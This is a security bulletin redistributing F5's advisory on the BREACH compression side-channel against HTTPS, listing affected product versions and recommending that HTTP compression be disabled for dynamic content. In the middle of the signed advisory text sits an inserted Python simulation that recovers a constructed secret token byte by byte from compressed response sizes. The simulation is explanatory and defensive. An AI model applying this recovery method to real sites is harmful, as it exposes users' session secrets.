23 August 2013
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2013.1149
           sol14634: SSL / TLS BREACH vulnerability - CVE-2013-3587
                               23 August 2013

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           F5 Products
Publisher:         F5
Operating System:  Network Appliance
Impact/Access:     Access Privileged Data -- Remote/Unauthenticated
Resolution:        Patch/Upgrade
CVE Names:         CVE-2013-3587

Original Bulletin:
   http://support.f5.com/kb/en-us/solutions/public/14000/600/sol14634.html

- --------------------------BEGIN INCLUDED TEXT--------------------

sol14634: SSL / TLS BREACH vulnerability - CVE-2013-3587

Security Advisory

Original Publication Date: 08/22/2013

Description

The BREACH vulnerability allows attackers to discover secrets wrapped in HTTP
compression inside of SSL. By injecting plaintext into an HTTPS request, an
attacker can learn information about the corresponding HTTPS response by
measuring its size. This action relies on the attacker's ability to observe
the size of the ciphertext received by the browser while triggering a number
of strategically crafted requests to a target site.

Impact

By observing the length of compressed HTTPS responses, an attacker may be able
to obtain plaintext secrets from the ciphertext of an HTTPS stream.

Status

F5 Product Development has assigned ID 427375 (BIG-IP and Enterprise
Manager), ID 428152 (FirePass), and ID 428241 (ARX) to this vulnerability.
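The Description above is compact, so here is a local simulation of the oracle it describes, added to this redistribution as an illustration; it is not F5's code, not part of the AusCERT bulletin, and it contacts no server. Everything in it is constructed: the HTML page, the hypothetical CSRF token `DEMO_TOKEN`, the static markup `KNOWN_PREFIX` that precedes the secret, and a greedy LZ77 parse standing in for DEFLATE (token count instead of byte count, so the signal is exact rather than blurred by Huffman coding). The page has the two preconditions BREACH needs: it reflects an attacker-controlled parameter and carries a per-session secret in the same compressed body. `recover_token` shows the byte-at-a-time recovery, and the same function run with compression off shows why the advisory's Recommended action (disable HTTP compression for dynamic content) removes the leak.

```python
"""Simulated BREACH length oracle (added illustration, not F5 code).

No network traffic is involved; the "server" is render_page() and the
"wire" is the compressed size of its output.
"""
import string

# Constructed values. In a real attack the victim's browser is coerced into
# requesting the target page with the guess in a reflected parameter, and
# the attacker measures the TLS record sizes on the wire.
DEMO_TOKEN = "7f3a91c4e0b6d285"          # constructed per-session secret
KNOWN_PREFIX = 'csrf_token" value="'     # static markup just before the secret
ALPHABET = string.digits + "abcdef"      # assumption: the token is lowercase hex
MIN_MATCH = 3                            # shortest back-reference the toy parser emits


def render_page(reflected: str, token: str) -> bytes:
    """Constructed dynamic page with both BREACH preconditions: it reflects
    attacker-controlled input and embeds a secret in the same response body."""
    html = (
        "<html><body>"
        f"<p>You searched for: {reflected}</p>"
        f'<form><input type="hidden" name="csrf_token" value="{token}"></form>'
        "</body></html>"
    )
    return html.encode()


def lz77_token_count(data: bytes) -> int:
    """Greedy LZ77 parse; returns the number of emitted tokens (literals plus
    back-references). This stands in for DEFLATE output size: real DEFLATE
    Huffman-codes the same tokens, which adds bit-level noise that the BREACH
    authors work around with padding tricks, but the leak is the same."""
    n, i, count = len(data), 0, 0
    while i < n:
        best = 0
        for j in range(i):                       # toy: unbounded window
            k = 0
            while i + k < n and data[j + k] == data[i + k]:
                k += 1
            best = max(best, k)
        i += best if best >= MIN_MATCH else 1
        count += 1
    return count


def response_length(body: bytes, compress: bool) -> int:
    """What the attacker can measure. TLS adds per-record overhead that does
    not depend on the plaintext (block-cipher padding only coarsens the
    measurement), so the compressed body size is what varies per request."""
    return lz77_token_count(body) if compress else len(body)


def make_oracle(token: str, compress: bool):
    """Return guess -> observed size for a server holding `token`."""
    return lambda guess: response_length(render_page(guess, token), compress)


def recover_token(oracle, prefix: str, token_len: int, alphabet: str = ALPHABET):
    """Byte-at-a-time recovery. A correct next character lets the compressor
    extend the back-reference from the reflected guess into the real secret,
    so the response shrinks by one token. Returns None when the oracle gives
    no signal (every guess yields the same size), which is exactly what
    happens once HTTP compression is disabled for the dynamic response."""
    recovered = ""
    for _ in range(token_len):
        sizes = {c: oracle(prefix + recovered + c) for c in alphabet}
        if min(sizes.values()) == max(sizes.values()):
            return None                          # no length oracle available
        recovered += min(sizes, key=sizes.get)
    return recovered


if __name__ == "__main__":
    n = len(DEMO_TOKEN)
    print("compression on :", recover_token(make_oracle(DEMO_TOKEN, True), KNOWN_PREFIX, n))
    print("compression off:", recover_token(make_oracle(DEMO_TOKEN, False), KNOWN_PREFIX, n))
```

Two caveats for anyone mapping this back to the advisory. First, the leak is in HTTP-level compression (gzip/DEFLATE of the body), so turning off TLS-level compression, the CRIME fix, does not stop it; the compression setting that matters is the one the appliance applies to responses on the affected SSL virtual servers, and the advisory defers to the product guides for where that lives. Second, the second mitigation it offers, compressing static content only, works because a static object neither reflects attacker input nor carries a per-user secret, so there is nothing for the size comparison to reveal.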
To determine if your release is known to be vulnerable, the components or
features that are affected by the vulnerability, and for information about
releases or hotfixes that address the vulnerability, refer to the following
table:

Product                 Versions known to     Versions known to     Vulnerable component
                        be vulnerable         be not vulnerable     or feature

BIG-IP LTM              9.0.0 - 9.6.1         None                  SSL virtual servers
                        10.0.0 - 10.2.4
                        11.0.0 - 11.4.0

BIG-IP AAM              11.4.0                None                  SSL virtual servers

BIG-IP AFM              11.3.0 - 11.4.0       None                  SSL virtual servers

BIG-IP Analytics        11.0.0 - 11.4.0       None                  SSL virtual servers

BIG-IP APM              10.1.0 - 10.2.4       None                  SSL virtual servers
                        11.0.0 - 11.4.0

BIG-IP ASM              9.2.0 - 9.4.8         None                  SSL virtual servers
                        10.0.0 - 10.2.4
                        11.0.0 - 11.4.0

BIG-IP Edge Gateway     10.1.0 - 10.2.4       None                  SSL virtual servers
                        11.0.0 - 11.4.0

BIG-IP GTM              None                  9.2.2 - 9.4.8         None
                                              10.0.0 - 10.2.4
                                              11.0.0 - 11.4.0

BIG-IP Link Controller  9.2.2 - 9.4.8         None                  SSL virtual servers
                        10.0.0 - 10.2.4
                        11.0.0 - 11.4.0

BIG-IP PEM              11.3.0 - 11.4.0       None                  SSL virtual servers

BIG-IP PSM              9.4.5 - 9.4.8         None                  SSL virtual servers
                        10.0.0 - 10.2.4
                        11.0.0 - 11.4.0

BIG-IP WebAccelerator   9.4.0 - 9.4.8         None                  SSL virtual servers
                        10.0.0 - 10.2.4
                        11.0.0 - 11.3.0

BIG-IP WOM              10.0.0 - 10.2.4       None                  SSL virtual servers
                        11.0.0 - 11.3.0

ARX                     5.0.0 - 5.3.1         None                  ARX Manager GUI
                        6.0.0 - 6.4.0

Enterprise Manager      None                  1.6.0 - 1.8.0         None
                                              2.0.0 - 2.3.0
                                              3.0.0 - 3.1.1

FirePass                6.0.0 - 6.1.0         None                  Web services
                        7.0.0

BIG-IQ Cloud            None                  4.0.0 - 4.1.0         None

BIG-IQ Security         None                  4.0.0 - 4.1.0         None

Recommended action

To mitigate this vulnerability, you can disable HTTP compression, or only
enable HTTP compression for static content. For information about configuring
HTTP compression, refer to the product guides for your specific product and
version.

Impact of Action: Slower page load times occur for dynamic content.

Supplemental Information

SOL9970: Subscribing to email notifications regarding F5 products
SOL9957: Creating a custom RSS feed to view new and updated documents.
SOL4602: Overview of the F5 security vulnerability response policy
SOL4918: Overview of the F5 critical issue hotfix policy
SOL167: Downloading software and firmware from F5
SOL13123: Managing BIG-IP product hotfixes (11.x)
SOL10025: Managing BIG-IP product hotfixes (10.x)
SOL6845: Managing BIG-IP product hotfixes (9.x)
SOL9502: BIG-IP hotfix matrix
SOL10322: FirePass hotfix matrix
SOL12766: ARX hotfix matrix
SOL3430: Installing FirePass hotfixes

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If you
do not know who that is, please send an email to
firstname.lastname@example.org and we will forward your request to the
appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.
If you have any questions or need further information, please contact them
directly.

Previous advisories and external security bulletins can be retrieved from:

        http://www.auscert.org.au/render.html?cid=1980

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: email@example.com
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBUhbeRBLndAQH1ShLAQLGCQ//cxPOz1UNGWU+0rVPAmfgSRTcXKDYj1Ud
H0lskYuTPnrYGz+hLRjB462rzA0P/0/0g8+MvKS1raxtFzMWbKjqClMftWQ+NiKg
s0dyHNu6Ax+x6+FNsIGv1zSCvmxnsdISAwrhOGLyNDuAyIFh0T6XEcxhkEsg/zC2
M3VSMeB/Vqc7OhirQ7ENEcodJRrAsA2zg/SDZa4dWjD+aZsSK3oSJGDLaiNoyeH6
CKSW/gA1lfTRvFX9/pDJRSbgF+MMRenp3JqcQocYjmI0ex5ArEi2W5AOIsYPP21C
fnDtUoTtXiDXaxy5RMDdcdGe9u9/ICu8KBQ+qJRo0y8L49l6IamHoNSdsu74ZH5z
da8zKkUuZqo/mxk4ML0BUxsQJ//eMHJETujjOcfgSVBp4k+F+EHp4QNqhWrKNdOI
YyP0+RY/a9BEohHHJKK7lz/sQEil1D6iTejGhQoG5CobhMCx523OWnz750JbAExo
8IdPhLjci4e8N7/+pJSN6MWlMjkYgbAjAloGOIsq6JyATqXNSmHTVEQ5LnLD5Pik
oVmkFMLNdtPA1KuJHHKGijaGWWNERid2u4wcECVfdAL6OjRnE/MjhAz96lvoH1cR
W2RHb166wfkwusi8Q/pEQGfyp22jcEaTQjrKG4FpSGLVWj6c+0TLuvVHd9jVJHQ2
U8TzO0Ec5vo=
=pe1x
-----END PGP SIGNATURE-----